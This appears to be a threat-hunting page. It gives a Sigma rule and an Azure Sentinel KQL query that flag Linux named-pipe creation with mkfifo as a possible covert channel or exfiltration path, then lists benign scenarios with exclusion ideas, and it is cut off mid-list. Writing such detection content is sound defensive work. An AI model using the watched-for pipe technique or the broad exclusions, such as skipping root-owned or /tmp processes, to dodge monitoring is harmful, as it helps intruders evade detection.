The creation of a named pipe via mkfifo may indicate an adversary attempting to establish a covert communication channel or exfiltration pathway. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential lateral movement or data exfiltration tactics that may evade traditional detection methods.
Detection Rule
title: Named Pipe Created Via Mkfifo
id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
status: test
description: Detects the creation of a new named pipe using the "mkfifo" utility
references:
- https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/mkfifo'
condition: selection
falsepositives:
- Unknown
level: low
imProcessCreate
| where TargetProcessName endswith "/mkfifo"Scenario: System Administrator Creates Named Pipe for Inter-Process Communication (IPC)
Description: A sysadmin uses mkfifo to set up a named pipe for communication between two services.
Filter/Exclusion: Check for the presence of known administrative tools or directories (e.g., /var/run, /tmp, /usr/local/bin) and exclude processes owned by root or sysadmin users.
Scenario: Scheduled Job Uses Named Pipe for Data Streaming
Description: A cron job or systemd timer creates a named pipe to stream data between services (e.g., log aggregation or real-time monitoring).
Filter/Exclusion: Filter by process names associated with scheduled tasks (e.g., cron, systemd, logrotate) or check for job IDs in /var/log/syslog or /var/log/cron.
Scenario: Developer Testing Pipe-Based Communication
Description: A developer uses mkfifo in a test script to simulate pipe-based communication between two processes (e.g., for testing a microservice architecture).
Filter/Exclusion: Exclude processes running in development directories (e.g., /home/dev/project/) or filter by user IDs associated with development teams.
Scenario: Network Monitoring Tool Uses Named Pipe for Data Aggregation
Description: A network monitoring tool (e.g., nagios, prometheus, or telegraf) creates a named pipe to aggregate metrics from multiple sources.
Filter/Exclusion: Check for known monitoring tool binaries or directories (e.g., /opt/prometheus/, /etc/nagios/) and exclude processes with known monitoring service names.
Scenario: Containerized Application Uses Named Pipe for Inter-Container Communication
Description: A Docker or Kubernetes container uses a named pipe to communicate between containers or with the host system.
*Filter/